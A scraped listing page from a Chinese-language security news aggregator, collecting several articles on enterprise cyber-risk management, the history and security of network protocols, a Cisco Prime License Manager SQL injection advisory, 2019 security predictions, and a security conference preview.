Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all 12749 articles
Browse latest View live

网络风险管理的三个关键词:协作、数据、评估

$
0
0

企业风险管理(ERM)的目标即企业可用最经济合理的方法来综合处理风险。过程可简述为对企业可能面临的各种风险进行评估,对其进行分类、量化,了解对风险的容忍度,并适时采取及时有效的方法进行防范和控制。


网络风险管理的三个关键词:协作、数据、评估

在过去,当企业着眼于风险管理时,财务风险、监管风险和运营风险为关注的重点,比如汇率、利率的变化,是否可以拿到生产许可,或者物流、仓库存在的隐患…当下,随着企业数字化程度的加深,网络风险日益受到企业管理层的关注,进入了风险管理目标的第一梯队,这给安全管理人员带来了新挑战:量化网络安全事件的商业影响是一项非常困难的任务,而量化此类事件发生的可能性则更为困难。

技术与业务的协作

在ERM框架中,“风险”这个词对不同的角色有着不同的含义。网络安全方面的负责人,往往关注于技术问题,例如,如果漏洞没有被修补,攻击者可利用它造成什么样的破坏。对于同样的问题,从业务的角度看到的可能是,存在漏洞可能会导致数据库被入侵,数据被窃取,将导致特定数量的业务损失,并会产生罚款和修复费用。对于企业的决策层来说,需要去确定一个降低风险的措施是否有意义,若是不能显著的降低风险,或者是风险涉及的系统并不关键,那么,最好把时间和金钱花在其他地方。

Gartner的分析师Brian Reed说过:技术人员和业务人员之间缺乏沟通,这是企业一直遇到的问题。业务人员不理解技术问题,技术人员不知道如何证明业务价值。

联邦快递习惯于为圣诞节前后发生的中断风险做计划,因为这是航运公司的旺季。然而,在2017年,一场勒索软件的袭击在6月份发生,造成了大约 3亿美元 的损失。可见,安全专家与业务部门的深入合作变得尤为重要,大家若多一些时间进行沟通,可以使对风险得管理变得更加有效。

投入更多的精力在企业数据的保护

近两年,网络风险最热的话题,非数据泄露莫属。数据泄露似乎每天都在发生,Facebook、Under Armour、AcFun、华住…用户数据是企业的宝贵财富,企业处理这些数据时面临着极大风险。想象一下,一觉醒来发现自己企业因数据泄露而占据各大新闻头条,是多么恐怖。

现今,相关法律、规范也越来越完善,例如2018年5月1日实施的《信息安全技术个人信息安全规范》、2018年5月25日,欧盟《通用数据保护条例》GDPR正式生效。若企业没有恰当地保护数据,会面临监管机构的严厉处罚。

至于具体的措施,除基于企业自身情况,做好数据治理、使用如访问控制、数据防泄漏、业务数据风险管理等相关的数据安全技术外,也不应忽视对内部员工的意识教育。

采用更多的评估方法

由于风险无时无刻都在变化,企业需要能够科学的量化网络风险发生的可能性,这一点也是网络保险行业遇到的最大难题,虽然现在网络保险很热,但是纵观全球,大型保险公司也没有广泛的推广网络保险政策。市场需求的增长也在推动保险行业从业者前行,近两年,网络保险的从业者也在不断优化风险评估的过程,比如引入“安全评级服务”,从外部的角度去衡量企业的风险,再结合传统的评估手段,如问卷、现场评估,可以使评估结果更加可靠。

企业也可参照这种方式,通过评级或审计的方式来进行风险评估。目前,安全评估服务还是一个新兴行业,全球专业从事安全评级服务的企业约10家,最早成立的PREVALENT注册时间为2004年。其中,除了UpGuard及安全值外,全部企业均在美国注册。(UpGuard原为一家澳洲初创企业,后把总部搬到了旧金山;安全值为中国团队,总部在北京)。


网络协议传奇(五):大国阴影难消除

$
0
0

温顿瑟夫与TCP/IP的风云际会始于1973年,他在后来的回忆中提到,直到20年后他才意识到当年参与的这项开创性工作正在改变世界,而触发这一认知的是网景公司推出的万维网服务,“这意味着普通人也能随意使用网络,我发现变化真的发生了”。

但是,如同物理学史上著名的“两朵乌云说”,就在温顿瑟夫们为互联网的伟大而弹冠相庆时,互联网上空已经乌云来袭,并且它向人们发出了强烈的安全警示。


网络协议传奇(五):大国阴影难消除

(图片来源:包图网)

网络安全第一课

1988年,罗伯特莫里斯还在美国康奈尔大学读书。11月2日晚上7点左右,在好奇心的驱使下,他在网络上释放了一段自己编写的“蠕虫”程序,对于这段只有99行代码的程序,以莫里斯的本意是想用它来测量一下当时的互联网规模。但令所有人都没想到的是,这个小小的举动差点摧毁了年轻的互联网。

意外源于莫里斯在“蠕虫”传播机制上的编程错误,致使它把一个可能是无害的智力练习变成了恶意的拒绝服务攻击――失控的“蠕虫”高速自我复制,挤占网络上计算机系统里的硬盘和内存空间,导致它们纷纷因不堪重负而宕机。由于“蠕虫”占用了大量系统资源,实际上也使网络陷入了瘫痪,大量的数据和资料毁于一旦,受波及的计算机超过了当时所有联网计算机的10%,损失接近1亿美元。

莫里斯蠕虫病毒震动了年轻的互联网。它是历史上第一个通过互联网传播的计算机病毒,让早期的互联网运营者和用户们首次看到了网络攻击的威力某种程度上,它也直接催生了计算机及网络安全行业的兴起。很显然,这是一场人祸,但是从技术角度看,这又是一场必然发生的天灾,只有这时,那些互联网的设计者们才意识到,当年他们犯下了一个严重的错误。

开创者忽略安全

有一个问题一直让温顿瑟夫们倍感遗憾――对网络安全的考虑一开始就被他们给遗漏掉了!“如果我现在能重新发明一次互联网,我会在一开始就考虑加入更多保护措施,从互联网后台而不是终端就尽可能杜绝负面的东西,但在当时,很多保护方法尚未问世。”温顿瑟夫说。

温顿瑟夫的懊恼溢于言表,事实上,在他出品的TCP/IP协议中,IP协议本身就没有提供任何安全特性。但这也不能怪他,他终究也绕不开时代的局限。当年大多的网络连接发生在高等学府和高级研究机构之间,网络用户和网络运营环境是如此地单纯,以至于人们很自然地忽略了网络安全问题。

另外,从技术工程角度看,这也是一种必然。从功能逻辑区分,网络协议可以分为通信协议和安全协议,前者负责通信能力和传输效率,后者管控通信过程中的安全连接和安全传输。在网络设计之初,开天辟地的科学家们自然会将关注点放在通信协议上面,因为这是实现联网功能的前提,他们首要面对的问题就是不同计算机和不同网络之间如何实现互联互通,如何实现数据的正常分发,让数据找对路,找到门,顺利到达到指定位置。

网络安全问题更大的爆发发生在后来的互联网商业化运营阶段,那个时候距离温顿瑟夫们的创世之举已有更为漫长的岁月相隔。

不过,温顿瑟夫的观点并不过时,那是代表了当下的人们对未来网络安全的一种期许,它有别于过去人们更多采用叠加于网络和终端之上的防火墙、防病毒等手段来实施网络保护,而是希望让网络自己保护自己,即在网络协议层面就构建出网络的本质安全能力,进而在互联网“后台”就可以“尽可能杜绝负面的东西”。

人们也是这样做的,通过对现有网络安全协议的改进或者重新设计,赋予网络协议族更为强健的安全能力,人们的这些行动涵盖了OSI参考模型中七层网络的不同层次。当然,不可回避的问题是,网络列车已经行驶在高速路上,一切补救措施只能在高速运动中完成,这无疑给人们增加了难度。

先行者路径垄断

为了解决数据在TCP上的安全传输问题,网景通信公司(Netscape Communications Corporation)在1994年提出了Secure Socket Layer(SSL)协议(又称套接字安全协议)。由于发布的SSL2没有和网景公司之外的安全专家商讨,考虑得不够全面,存在着严重的弱点。在1995年,网景公司发布了SSL3,修补了SSL2协议上的很多漏洞。SSL3发布以后,得到了业界的高度重视。之后IETF成立Transport Layer Security(TLS)工作组,基于SSL3设计了TLS,并于1999年、2006年和2008年分别发布了TLS 1.0,TLS 1.1和TLS 1.2,修补了协议中设计和实现中存在的大量漏洞。

这个事实告诉我们:安全是相对的。协议漏洞的修补工作不会因你已经耗时十年就可大事完毕,在未来的时间里,依然会有顺延的版本序号去标示不断出现的漏洞。为何如此?一个重要的原因就在于我们无法预料未来,就像温顿瑟夫无法意识到IP的安全问题一样,这就是历史的局限。

一些标准组织从上世纪90年代初期,便陆续开展了面向数据链路层、IP层的安全研究项目,制定出了一些通用安全协议,其目的就是要弥补IP协议的安全缺陷。然后它们被应用于各种网络当中。但是,这些千辛万苦开发出来的安全协议,在当今的应用场景中往往已经成为安全黑洞。

在这里,我们需要简单回顾一下网络安全思维的历史沿革。起初,网络安全协议的设计思路是基于主、从结构的安全理念,其假设的前提是对用户而言,网络是完全可信的,也就是说打手机的人会无条件信任基站,只要基站确认了手机的合法性,二者就可以建立连接进行通信,而手机则无需确认基站的合法性。这个逻辑被称为单向认证。Wi-Fi的WEP安全机制就是这个逻辑的产物之一。

这种安全逻辑设计符合那个开创时代的实际――彼时基站还是一个技术、价格门槛极高的通信设备,一般个人难以企及,它的拥有者(电信运营商)完全可以等同于天然的诚信者。但今天的情况大不相同,基站成本越来越低,一个双肩背就可以装着它招摇过市。也正因如此,假基站、“中间人”等网络安全问题频繁爆发。

在安全压力下,Wi-Fi在一次重大安全升级中采用了802.1x。虽然它的安全机制实现了单向认证向准双向认证的演进,只可惜,这种向双向认证的演进并不彻底。2017年10月,Wi-Fi安全协议中的最高安全机制WPA2被宣告破解。随后,Wi-Fi联盟紧急于2018年1月在美国CES展会上发布了WPA3,并在同年6月宣布WPA3协议最终完成,可谓紧锣密鼓。但就技术而言,WPA3没有改变Wi-Fi的认证架构,在继续沿用过去不安全架构的情况下,WPA3依旧无法解决诸如中间人攻击等安全问题。

Wi-Fi阵营对安全技术路径的坚守并非出自情怀,而是源于持续市场垄断的考量,在业已成功的庞大市场面前,Wi-Fi只能一条道走到黑。当然,在自身存在明显缺陷的情况下,Wi-Fi对于竞争者的敏感和警惕则被演绎得无以复加。而Wi-Fi也确实用自己的行动告诉了它的对手们,什么叫做江湖。此时,曾经的政府之手会再度出现,只不过这次它走向了反面。

后来者难破棋局

欧洲的HiperLAN是早期的无线局域网技术之一,作为美国技术方案(IEEE802.11系列,公众俗称Wi-Fi网络)的同代竞争者,当年被美方成功忽悠到美国控制的标准组织IEEE去搞标准化,最终,美国企业主导的技术方案不出意外地成为了正式标准,HiperLAN被涮了一遭,并活生生地被拖成了黄花菜。而无线局域网协议技术的另一个路线代表――我国的WAPI也同样在美方干预下遭遇不顺,产业化和商用进程受到极大干扰,只不过它的经历更加跌宕起伏(这一段典故众所周知,不再赘述)。一切都在掌握中,在2003年IEEE的一份内部文档中指出:战争要一场一场打,WAPI就是下一个(HiperLan是上一个)。

无线局域网领域技术路线的博弈只是网络协议战争的冰山一角,隐藏于冰山之下的暗战更为刺激。正如上面所述,越来越多的网络安全协议被设计并应用,但令人尴尬的是很多安全协议在刚刚推出的时候就被发现其具有漏洞。不过,还有一种特定的存在,就是你一直没发现它有漏洞,直到某个人的出现,譬如美国人爱德华斯诺登(Edward Snowden)。

2013年6月,前美国中情局(CIA)职员爱德华斯诺登披露了美国的“棱镜计划”,其中的一项重要信息就是:美国通过控制国际标准的制定来实现网络信息监控,美国国家安全局(NSA)曾秘密运作安全标准成为国际标准。后续揭露的信息显示,美国政府用长达数十年的时间开发并完善可为其控制的网络安全协议技术和标准体系,这其中就包括802.1x、IEEE 802.11i等多项安全协议标准,以维护其国家网络安全利益。更多的细节包括利用其标准中蓄意制造的网络安全协议漏洞,进行大规模全球网络监控和网络攻击。目前可见的资料显示,早在1986年,美国国家安全局(NSA)就已开始介入网络安全协议的“开发”。

不安全的“网络安全协议”所带来的破坏性更大,它十分隐蔽,被发现并消除的难度也更大,业内对此有着形象的比喻:毒种子比毒面包更可怕!当前,业内已有共识――网络协议技术的安全问题正在成为网络安全的重灾区。

“棱镜门”的出现,直接导致了全球网络信任基础的崩塌。在2015年的一次国际标准组织ISO/IEC标准讨论中,挪威专家明确指出“我们非常清晰的一致意见是SIMON和SPECK算法不应当被包含进ISO 29192-2中,这个结论基于如下事实:这些算法是NSA提出的,我们不信任NSA会善意地提出安全标准。”我们无需了解技术细节,从这段话语中自然可以嗅到空气中散发的疑虑情绪。

美国人之所以如此费尽心思,全在于网络协议太过重要。协议即规则,网络协议即网络的规则,它以繁复庞大的体量呈现于各种标准、规范文本当中,并被植入芯片、操作系统以及各种网络信息设备、具有网络信息功能的产品/设备当中,深入到完整的上下游产业链条中,分布于网络的每一个角落,是所谓“无协议不网络”。而网络安全协议是网络协议的基本组成部分,它不仅是网络安全的基石,更是当下网络协议演进发展的枢要地带。

网络协议对于产业全局导向的影响怎么形容都不为过。从中我们可以理解到美国人为什么对WAPI穷追猛打,除了2003-2004年间的强势干预外,美国几乎历年的政府相关报告中都会出现WAPI的身影。其对WAPI的最新表述是在2018年6月发布的一份白宫报告,在那里,他们将WAPI归于“战略性产业”当中――时隔15年,他们终于说出了心里话。

客观来看,在网络协议技术发生、发展中,美国方面做出了重要的贡献,时至今日,这种格局依然没有改变。但是,当其技术能力与其他国家形成了极不对称的局面后,在不受规制的能力和影响力驱使下,网络成为美国窥探、威胁他国的工具。此种情形,人们也许会想起上世纪七、八十年代的那个年轻的互联网,一众科学大家,一众企业推手,宛若一众白衣少年,一切都在朝气蓬勃、意气风发中升腾挥洒……

从阿帕网这只振动着翅膀的蝴蝶开始,人类走过了近半个世纪的历程。从美国西海岸互相连接的四台大型主机起始,人们逐步将散落于世界各地的局域网络勾连起来,最终将世界变成了地球村。网络为人类创造了难以估量的长期价值,在可预见的未来,它还将连接一切,它的传奇也将长期延续下去。而与其互为表里的网络协议的传奇故事也将同步上演,它们将继续凝聚人类的智慧,兼容历史,融合现在,拥抱未来,它们不断被创造、演变、革新,并与参与此间的个人、企业、行业、国家一道,汇集成一部人类科技创新的伟大史诗。

参考资料: 揭开数据中心网络协议家族史 互联网怪谈9:没有阿帕网,就没有互联网 百度百科 TCP/IP协议 网络的基本概念和分类 阿帕网:“冷战”催生的传奇作者:刘洋 发布时间:2012-05-17 来源:环球财经 回顾互联网的前身――“阿帕网” TCP/IP协议维基百科/百度百科 技术往事:改变世界的TCP/IP协议 从计算机和计算机网络的发展看TCP/IP协议的重要性 陈中炜 网络安全协议在计算机通信技术当中的作用与意义 计算机通信技术当中网络安全协议的作用剖析 施乐的悲剧 环球财经 杨涛编译 《连线》杂志文章《TCP/IP设计者卡恩与互联网的第一次“圣餐”》 《计算机网络(第5版)》 互联网简史 拜读一下计算机界牛人前辈们 百度百科:BSD IPv6的未来 第9章 网络安全协议(https://wenku.baidu.com/view/cd6d092b647d27284b7351ec.html)

(连载完)

Cisco Fixes Critical SQL Injection Vulnerability in Prime License Manager

$
0
0

Cisco just patched a critical SQL injection vulnerability residing in the web framework code of theCisco Prime License Manager (PLM) designed to help administrators to manage user licenses on an enterprise-wide scale.

Potential remote attackers could execute arbitrary SQL queries on vulnerable machines after successfully exploiting the CVE-2018-15441 security issue.

According to Cisco's advisory detailing this SQL injection security bug in theCisco Prime License Manager solution, the issue resides in the "lack of proper validation of user-supplied input in SQL queries."

Cisco also says that "An attacker could exploit this vulnerability by sending crafted HTTP POST requests that contain malicious SQL statements to an affected application."

Furthermore, adversaries that manage to use an exploit to compromise a vulnerable target can also delete or modify any data within Prime License Manager's database, as well as obtain shell access with the system privileges of the postgresuser account.

There are no known workarounds to mitigate this vulnerability at the moment, but Cisco has already released software updates which address the vulnerability.

This vulnerability impacts only PLM 11.0.1 or later installations

The CVE-2018-15441 security issue impacts CiscoPrime License Manager 11.0.1 and later, with both coresident and standalone deployments being affected.

In coresident configurations, theCiscoPrime License Manager solution is installed as part of theCiscoUnified Communications Manager and CiscoUnity Connection suites.

Moreover,becauseCisco PLM is not included within versions 12.0 or later of CiscoUnity Connection and CiscoUnified Communications Manager, these versions of the two suites are not impacted by this SQL injection vulnerability.

"The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory" also says the advisory.

2019年网络安全的9个预测

$
0
0

预测一向很难,而且网络安全领域的预测更难。威胁界面广阔无垠,攻击性和防御性技术层出不穷,民族国家攻击无论规模还是复杂程度都在不断增加。


2019年网络安全的9个预测

网络战争迷雾令人很难看清或评估任何趋势。比如说,去年,CSO网站对2018年的预测就没料想到加密货币挖矿的快速上升。事后来看的话,这种对网络罪犯而言相对容易且低风险的变现手法应该是很明显的。

不过,CSO网站去年的预测还是命中了一些:威胁检测过程的自动化程度上升、涉IoT设备的攻击大幅增加、网络犯罪增多导致的信任衰退等等。

今年,CSO网站给出的未来12个月里可能出现的重大事件或趋势如下:

1. 勒索软件逐渐减少,但破坏力依然惊人

因为罪犯转向其他方式赚取收益,勒索软件将会逐渐消退。但勒索软件仍是个问题,会进化成更针对性的攻击。卡巴斯基数据显示,2017和2018年遭遇过勒索软件的用户数量比2016到2017年时间段内遭遇勒索软件攻击的人数减少了近30%。

但随机性减少,针对性却变强了,后期的勒索软件攻击大多影响重大。赛门铁克发现,SamSam勒索软件背后的黑客团伙如今就主要针对数量相对较少的美国公司开展行动,大部分是市政和医疗机构。

勒索软件攻击数量减少的原因是罪犯找到了加密货币劫持和其他更有效的生财之道。现成加密货币挖矿工具的数量和质量意味着罪犯无需多少技术。卡巴斯基给出的数据:过去一年加密货币挖矿攻击受害者数量上升了44.5%,就充分体现了这一点。隐藏挖币机在2019年继续猛增,恶意软件作者以此侵害你的业务。只要攻击者能从挖币机感染中赚到外快,加密货币挖矿就会继续是个威胁。

2. 隐私监管和公众对隐私的看法将驱动数据保护策略

去年,CSO网站预测欧盟将很快处罚几家违反了《通用数据保护条例》(GDPR)的公司以杀鸡儆猴。但该预测并没有成真。尽管如此,2019年里,个人信息受损会遭到处罚的威胁依然会对安全运营产生巨大的影响。

这些处罚很有可能即将到来。2019年上半年,GDPR的实施将开始变严。涉嫌以监视用户隐私牟利的公司,比如谷歌和Facebook,未来几年可能不会太好过。已有数百份投诉发出,其中一些投诉对象就是谷歌和Facebook。

2019年,我们将看到欧盟开始回应这些投诉。GDPR和其他隐私监管规定的风险将进一步阐明。即便GDPR不回应,也会释放出不用太在意这项条例的信号。

对公司如何保护个人信息的关注增加,将会推动更多人向这些公司问责。消费者对层出不穷的安全事件和其他不道德信息披露(比如Facebook)的反应,会促使他们要求公司企业对用户信息设置更多默认隐私和控制。

2019年有可能会颁布类似GDPR的隐私法律。《加州消费者隐私法案》已被通过,将在2020年生效。11月1日美国参议院 Ron Wyden 提交了《消费者数据保护法案》(CDPA),该法案对隐私违法行为的处罚非常严厉,甚至包括了入狱。

鉴于美国联邦政府效力的当前状态,该法案不太可能吸引太多关注。同时,美国大多数处理消费者数据的公司企业将以GDPR和CCPA作为参考。加州和纽约将持续推动有关消费者数据隐私的协商,美国联邦政府却在故意拖延。

公司企业将开始考虑采用隐私优先的数据处理方式,尤其是在这些法律扩展到更多辖区和针对银行、医疗与支付等特定垂直行业的情况下。公司企业收集、使用和共享数据的方式需要进行重大调整。

3. 民族国家对个人的攻击和监视会更多

对记者、持不同政见者和政治家的黑客国家队网络攻击还将继续增多。有类似意向的政府对自己国土上的此类攻击会睁一只眼闭一只眼。

对本国公民实施监视的最坏可能结果,在沙特异议记者卡舒吉被虐杀案中得到了充分体现。以色列《国土报》报道称,沙特政府利用以色列网络武器在卡舒吉位于加拿大时对他实施监视。

以色列政府似乎是其他政府监视本国国民所用技术的主要出口商。《国土报》另一篇报道称,多个国家在用以色列软件监视异见者和同性恋。

4. 微软将在其所有主流产品中加装高级威胁防护(ATP)

windows 10 高级威胁防护(ATP)是可以让持有E5安全证书的用户了解攻击者所作所为的一项服务。计算机连接到ATP服务时即启动遥测。

微软将在所有版本的Windows上推广ATP服务,借以打造重视安全的品牌形象。未来几年,该项服务将成为令用户选择Windows产品而不是IBM Red Hat 产品的一大卖点。

5. 确认中期选举中出现了选票造假

选票造假的确认将刺激人们呼吁更好的选民信息保护和推动更多的人参与在线投票过程。但想要让投票尽可能方便的人和想要保护投票过程完整性的人之间的冲突仍将继续。

我们需要确保每个人都能在线登记和投票,但我们也需要采取重要措施以确保可以安全而恰当地做这件事。

6. 多因子身份验证将成为所有在线交易的标准

尽管远不是完美解决方案,大多数网站和在线服务将抛弃仅口令式的访问,提供带额外要求或可选身份验证的方法。一段时期内,不同形式的多因子身份验证(MFA)可能会使用户迷惑和感到沮丧。

只使用口令来验证身份会使我们对网络钓鱼和其他攻击愈加不设防。但所有供应商都急于实现不同形式的身份验证方法,意味着用户可能会因需管理多种双因子身份验证而烦躁不堪。在更标准化的过程出现之前,这种烦躁的状态估计不会得到改善。

而这类标准,至少在供应商端,已经着手在做了。从FIDO2浏览器增强和Duo/思科的并购就能看出端倪。来年有望看到这方面的更多创新,让MFA的使用更便捷更令人信服。

7. 鱼叉式网络钓鱼更具针对性

攻击者知道,越是了解你,对你网络钓鱼成功的可能性就越高。其中一些战术令人毛骨悚然。鱼叉式网络钓鱼的趋势之一,是黑客攻入电子邮件系统,潜伏并暗中学习,然后运用他们学到的信息和经常相互沟通的人所建立起的关系与信任。

这一趋势体现最明显就是抵押贷款欺诈――买房人将过户费汇往黑客假冒可信按揭代理发出的电子邮件中提供的虚假账户。攻击者黑掉抵押放贷机构的计算机,记下所有即将到来的交易及其截止日期。然后在抵押代理通常会发出汇款提醒邮件的日期之前,网络钓鱼攻击者使用该抵押代理的计算机向买房人发出附带虚假账户的过户费支付提醒邮件。天真的客户汇出费用,然后面临失去房子的后果(除非他们还能再拿出一笔过户费来完成真正的交易,而绝大多数人通常是不会有这么多闲钱的。)

8. 各国将设立网络战规则

即便是在常规战争中,大多数国家也都会就基本规则达成共识,比如不虐囚、不使用毒气、不屠杀平民等。这些规则设置了贴合世界上大多数国家利益的行为边界。

网络战中不存在这样的规则,某些国家似乎认为他们可以随心所欲地做任何事。朝鲜黑掉了索尼影业,俄罗斯黑关键工业控制系统并试图影响其他国家的选举,中国盗取知识产权,美国和以色列使用恶意软件摧毁伊朗核设施。数字边界正在被试探,一些民族国家已开始反击。数字战争中的《日内瓦公约》指日可期。

在网络战问题上,无论有没有规则,有些国家都会继续越界。俄罗斯、中国和朝鲜仍会是网络攻击者的天堂。网络攻击者将有更多的资源可用,无论这些资源是来自他们背后的政府,还是来自勒索软件和加密货币劫持攻击得来的不义之财。他们将运用这些资源开发新的攻击方式,提升其恶意软件的弹性和适应性。除非国际地缘政治发生重大变化,否则这一情况将持续发酵。而国际地缘政治发生重大变化,最早也要到下一次美国总统选举了。

9. 更多公司将要求CSO/CISO拥有网络安全硕士学位

网络安全培训会变得更加成熟,仅有培训认证已不足以使安全人员在职业生涯中更进一步。五花八门的安全认证系统无法提供合适的教育和训练。网络安全硕士学位遍地开花,包括加州大学伯克利分校和纽约州立大学这样的名牌大学都未能免俗,越来越多的公司企业希望聘用通过硕士培养过程获得跨学科技术技能的CSO/CISO。

【本文是51CTO专栏作者“”李少鹏“”的原创文章,转载请通过安全牛(微信公众号id:gooann-sectv)获取授权】

戳这里,看该作者更多好文

FIT 2019议题前瞻:从Bugbounty到网络空间,如何做好一名合格的白帽丨X-Tech技术派对

$
0
0

自网络问世以来,就在不断地通过各种方式改善人们的生活。如今步入“互联网+”时代,互联网的创新成果高度融合在了经济社会的各个领域之中,人们越来越多的日常行为得以通过网络实现。云计算、大数据、物联网、人工智能等等为代表的新一代信息技术与传统产业的融合创新,更是加速了数字化社会的转型革新。不断提升的创新力和生产力,也形成了更广泛的发展生态。

然而,安全问题并没有随着技术的发展而消失,反而在科技飞跃的时代迎来了爆发,漏洞、恶意软件、社会工程学等网络行为层出不穷。随着数字化转型的不断深入,各大传统领域正在以前所未有的速度被“织”进这张大网,网络安全的边界不断扩大。

“没有绝对安全的系统”这句话在安全行业已是众人皆知,作为从互联网诞生之日起就常伴其身的漏洞,随着科技多样化也同样变得难以防范,如今的网络在漏洞面前更加不堪一击。当网络和现实彼此融合的时候,网络安全问题影响的范围和深度也不可同日而语。

因此,面对日益复杂的网络态势,屡禁不止的漏洞威胁,这样一种机遇和挑战并存的时代,各位处于互联网安全顶端的大佬们又会有怎样的应对手段?

从Bugbounty看应用安全攻防

对于一家互联网企业而言,网络安全问题至关重要,但趋于某些条件的限制,很多企业并没有在安全方面有适当的投入,因此漏洞威胁并没有得到缓解。漏洞赏金计划如今已经成为了很多互联网公司的重要安全策略之一,在国内外都承担了相当关键的职能,并且上线一段时间以来表现也是相当的优越。不仅为企业大大减轻了运营成本,同时相较于企业自主聘请安全人员,也具有更高的效率和灵活性。

近两年,越来越多的组织、公司加入到了漏洞奖励计划,因此“Bugbounty”也逐渐变成了一项“全民运动”。


FIT 2019议题前瞻:从Bugbounty到网络空间,如何做好一名合格的白帽丨X-Tech技术派对

斗象科技CTO张天琪通过近年来亲身参与国外厂商漏洞挖掘经历,为大家分享当前互联网应用技术发展趋势及安全攻防趋势。随着当前互联网业务需求复杂度的提升,大量新型技术组件被引入应用构建之中,如新型数据库、缓存、消息队列、大数据组件、容器组件等等,从而大大增加了应用自身的攻击面。同时伴随大量业务向云上迁移,云服务提供的功能特性愈加丰富,使得当前构建应用安全体系往往需要兼顾web安全,移动安全,PC端安全等多种安全方向,增加了应用安全体系建设的难度。

本议题将通过大量真实案例,分享各类大型厂商在当前新技术环境下所暴露出的应用安全风险以及对应缓解措施。

张天琪是斗象科技联合创始人兼首席技术官,应用安全专家,国内首家互联网安全新媒体“CodeSec”创办人之一,国内领先的互联网安全服务平台“漏洞盒子”,全息安全风险监控与分析系统“网藤风险感知”技术总负责人。Qcon、GSMA、ISC、OWASP等行业峰会演讲者,多次上榜Google,Microsoft,Yahoo,Paypal等国外厂商安全名人堂,360 Hackpwn大赛评委。

基于网络空间搜索引擎的通用漏洞挖掘

自互联网诞生时起,网络空间就犹如混沌初开一般急速扩张,随着多年来的发展,互联网现今已从点对点链接这种虚拟状态上延伸和扩张到了物与物相连,将网络信息交换和人机交互带入了现实世界中,形成了万物互联的物联网。网络空间引擎能够将互联网上公开的网络资产和设备信息进行收集和整理,通过网络空间搜索引擎,我们可以快速的知道,我们身边有多少计算机,多少服务器,有多少联网设备。如果说GPS绘制了世界的地图,那么网络空间搜索引擎就是整个互联网世界的地图。

网络空间搜索引擎跟网络安全漏洞息息相关,常用来对已知组建的nday漏洞影响面进行测绘评估。本议题就将介绍通过利用网络空间搜索引擎ZoomEye对未知通用组件识别并进行0day漏洞挖掘一些方法探索。


FIT 2019议题前瞻:从Bugbounty到网络空间,如何做好一名合格的白帽丨X-Tech技术派对

黑哥(superhei),全名周景平,知道创宇首席安全官兼404实验室总监,多次带领团队协助修复了微软安全分级最高级别漏洞,也因于此,在2015年世界黑帽大会 BlackHat 上入选了微软“历史Top100贡献榜单”,次年再次入选年度MSRC 2016 Top100榜单。黑哥因在 Web 安全领域做出了杰出的贡献被称为“ 中国黑客传说”, 同时利用自身的影响力, 带动了一批年轻人一起做出了一些意义不凡的成绩。

K哥谈:白帽子转型养成之路

在多数人的认知中,“黑客”就是无恶不作的。孰不知,在黑客世界中,也同时存在着“黑”、“白”两道。他们做着相同的事情:通过自身卓越的技术,不断在网络中搜寻计算机、服务器与网络系统中的安全漏洞。其中,正义的一方,也就是我们所说的“白帽子”了。随着互联网技术的快速发展,数字化时代革新的加速,网络安全逐渐成为了国家乃至世界的主旋律,白帽子的队伍也不断的发展壮大。

黑客的外表下,隐藏着一颗正义的心。现今世界,网络安全隐患无处不在,各色漏洞不断爆发,当然,有攻就有防,面对黑客的步步紧逼、网络世界的重重威胁,正是无数的白帽子组成了网络世界的第一道屏障。


FIT 2019议题前瞻:从Bugbounty到网络空间,如何做好一名合格的白帽丨X-Tech技术派对

作为资深“白帽”,有的人说K哥的成长很传奇,有的人说很励志,有的人说很普通。因此,无论怎么样,通过本次议题,K哥将从白帽子过去的成长轨迹、目前心理与状态、未来发展与规划,这3个主要方向进行议题分享。

有的人放弃了安全,有的人始终追着安全领域的脚步,有的人从入门到入狱了,也有的人放弃了但是用了其他方式来实现自己的安全梦,从未成年到成年白帽的一些事儿,你会在这里听到很多耳熟能详的”梗”,结合昨天,今天,明天的方式思维进行交流,如:生活、工作、学习…等多角度分析,并且讲解过程中会剖析出更多的思考点和解决办法,最后在转型思考与建议的方向里给予一定程度的参考讲解。

K哥,孔韬循(K0r4dij-小K),丁牛科技现任CSO,著名信息安全团队破晓团队(Pox Team)创始人,半路高中辍学野路子出身,至今领域接触时间已逾10年,中途曾多年公益性质帮助过无数白帽子走上网络信息安全行业相关岗位,并正确的方式引导和协助白帽子群体制定自己专属的人生成长轨迹。从业多年安全并拥有多年国家级党政军信息安全项目服务经验,如:国家部委机关单位等。擅长渗透测试、Web漏洞挖掘、应急响应等信息安全技能,期间曾参与过世界一带一路-信息安全相关项目实施。作为安全从业者,始终相信:没有高手和菜鸟,只有玩的多和少!

FIT 2019互联网安全创新大会

CodeSec互联网安全创新大会(FIT)是由国内领先的互联网安全新媒体平台CodeSec.Net主办的年度互联网安全盛会,WitAwards互联网安全颁奖盛典也将同期举行。

FIT 2019大会会期为 2018年12月12日~13日 ,会议将在 上海宝华万豪酒店 举行。本次大会主论坛议程聚焦 「全球高峰会」、「前沿安全神盾局」、「WitAwards颁奖盛典」、「WIT安全创新者联盟」「X-TECH技术派对」、「HACK DEMO」 六大板块,独立分设 「白帽LIVE」「企业安全俱乐部」 两大分论坛,与来自全球的安全从业者、优秀技术专家、企业安全建设者、白帽安全专家、研究机构等共同展开演讲与探讨。同时 「中国首席信息安全官高峰论坛 」、 「漏洞马拉松线下邀请赛」 也将在特色分会场同期举行。此次盛会致力于分享2018年度安全行业创新硕果,共同探索与展望未来安全新边界。

>>>【FIT 2019官网】


FIT 2019议题前瞻:从Bugbounty到网络空间,如何做好一名合格的白帽丨X-Tech技术派对

【公益译文】网络安全滑动标尺模型 SANS分析师白皮书

$
0
0

【公益译文】网络安全滑动标尺模型 SANS分析师白皮书

阅读: 52

网络安全滑动标尺模型对组织在威胁防御方面的措施、能力以及所做的资源投资进行分类,详细探讨了网络安全的方方面面。该模型可作为了解网络安全措施的框架。模型的标尺用途广泛,如向非技术人员解释安全技术事宜,对资源和各项技能投资进行优先级排序和追踪、评估安全态势以及确保事件根本原因分析准确无误。

作者 :罗伯特 梅里尔 . 李( Robert M. Lee )

文章目录

执行摘要

